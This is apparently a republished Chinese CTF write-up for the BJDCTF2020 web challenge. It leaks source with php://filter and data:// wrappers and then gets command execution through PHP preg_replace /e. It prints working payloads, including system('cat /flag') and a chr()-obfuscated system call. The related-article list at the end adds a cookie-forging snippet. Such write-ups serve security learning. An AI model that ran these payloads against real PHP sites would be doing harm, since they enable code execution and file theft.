BUU [BJDCTF2020]ZJCTF,不过如此

这篇具有很好参考价值的文章主要介绍了BUU [BJDCTF2020]ZJCTF,不过如此。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

BUU [BJDCTF2020]ZJCTF,不过如此

和BUU [ZJCTF 2019]NiZhuanSiWei一样。

?text=data://text/plain,I have a dream
&file=php://filter/read=convert.base64-encode/resource=next.php

得到next.php源码。

<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
    return preg_replace('/(' . $re . ')/ei','strtolower("\\1")',$str);
}

foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}

function getFlag(){
	@eval($_GET['cmd']);
}

最终目的是调用getFlag()然后命令执行。

get和session两个值一样的,名字为id的变量,没什么用,估计是用来混淆不知道的那些人。

preg_replace()的/e模式存在命令执行漏洞。

深入研究preg_replace与代码执行 - 先知社区 (aliyun.com)

最终payload:文章来源地址https://www.toymoban.com/news/detail-535637.html

?text=data://text/plain,I have a dream&file=next.php&
+
\S*=${getFlag()}&cmd=system('cat /flag');
\S*=${system(chr(99).chr(97).chr(116).chr(32).chr(47).chr(102).chr(108).chr(97).chr(103))}
//chr拼接system的参数
\S*=${phpinfo()}可查看phpinfo()

到了这里,关于BUU [BJDCTF2020]ZJCTF,不过如此的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 安全 ctf-Web基础_cookie欺骗

    题目描述 Cookie :         Cookie欺骗、认证、伪造 解题思路: 1. 打开题目给的链接,显示:hello guest. only admin can get flag. 2. 使用F12快捷键进入开发者工具,选择控制台,修改管理员 admin 的 Cookie 值为 1(True): document.cookie   #查看cookie document.cookie = \\\'admin = 1\\\'  #将admin的值修

    2024年04月28日
    浏览(45)
  • 【CTF-web】变量1(php全局变量)

    题目链接:https://ctf.bugku.com/challenges/detail/id/76.html 注意到$$args,那么我们可以通过args输入一个已定义变量的名称来得到它的值,于是查询php的九大全局变量,如下表所示。 变量 作用 $_POST 广泛用于收集提交 method=“post” 的 HTML 表单后的表单数据。$_POST 也常用于传递变量。

    2024年02月12日
    浏览(46)
  • 【PWN · IntegerOverflow & ret2text】[BJDCTF 2020]babystack2.0

    第一次遇见整数溢出的题目,值得记录一下(虽然这里的整数溢出很简单 目录 前言 一、整数溢出 二、解题思路 1.ELF/checksec查看保护 2.IDA反汇编 3.整数溢出  4.exp编写 总结 整数溢出漏洞——对于有/无符号数,长/短位宽转换时机器码的变换策略所指。 如果一个整数用来计算

    2024年02月06日
    浏览(42)
  • 青少年CTF-Web-帝国CMS1-3通关记录

    本次进通过平台内题目进行,非真实环境。 首先下发题目链接 我们首先先找后台看看 后台地址为 /e/admin/ 随后,经过dirsearch进行扫描,得到了一个www.zip 访问扫描到的www.zip,得到网站源码 使用D盾扫描,得到eval后门。 蚁剑链接 得到根目录的Flag 这道题目和CMS01差不多,但是

    2024年02月03日
    浏览(49)
  • 【CTF-web】备份是个好习惯(查找备份文件、双写绕过、md5加密绕过)

    题目链接:https://ctf.bugku.com/challenges/detail/id/83.html 经过扫描可以找到index.php.bak备份文件,下载下来后打开发现是index.php的原代码,如下图所示。 由代码可知我们要绕过md5加密,两数如果满足科学计数法的形式的话,php会将其当作科学计数法所得的数字来进行比较,根据该原

    2024年02月12日
    浏览(41)
  • [ZJCTF 2019]NiZhuanSiWei

    目录 信息收集 代码审计 第一层 第二层 第三层 打开页面又是代码审计 代码如下 第一层 通过data伪协议模拟打开text文件 ?text=data://text/plain,welcome to the zjctf 第二层 通过filter伪协议读取useless.php file=php://filter/convert.base64-encode/resource=useless.php 进行base64解码后得到useless.php的内容

    2023年04月17日
    浏览(29)
  • [ZJCTF 2019]NiZhuanSiWei 1

     1.1打开题目地址,查看为PHP代码审计 代码审计走起,一步一步分析 2.1大体要传入三个参数,先看第一段语句,   知识点 1)PHP函数 1.isset:PHP: isset - Manual 2.file_get_contents:PHP: file_get_contents - Manual  2)关于伪协议常用的payload,包括读文件和php代码执行 1.?file=data:text/plain,?p

    2024年02月08日
    浏览(43)
  • BUU [vnctf2023]电子木鱼

    先看看题目,点不了。 看看源码。Rust整数溢出。 在 Rust 中,整数类型默认是有符号整数类型,意味着这些整数类型可以表示正数和负数。对于有符号整数类型,最高位用来表示符号,0 表示正数,1 表示负数。 当一个正数进行整数溢出时,也就是它的值超过了它的类型所能

    2024年02月12日
    浏览(34)
  • [ZJCTF 2019]NiZhuanSiWei 1详解

    知识点: data:// 写入数据 php://input 执行php //filter 查看源码 下面我们来看题吧,打开题目一看,直接是源码 我们需要get方式提交参数,text、file、password。 然后就是来到了第一个需要绕过的地方 要求text不为空,这是肯定的,主要看下一句,file_get_contents($text,\\\'r\\\')===\\\"welcome to

    2024年02月08日
    浏览(38)
  • BUU BRUTE 1(burpsuite爆破初学)

    打开靶机,只有用户名密码界面  首先f12,当然啥有用的都没有,这时候本萌新开始懵逼了,结合题目brute学习一下怎么爆破 这里参考BUUCTF Brute 1使用BurpSuite爆破详解_bill_fang的博客-CSDN博客师傅的文章,根据随便输的账号密码提示“用户名错误”,尝试先爆破用户名再爆破密

    2024年02月09日
    浏览(35)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包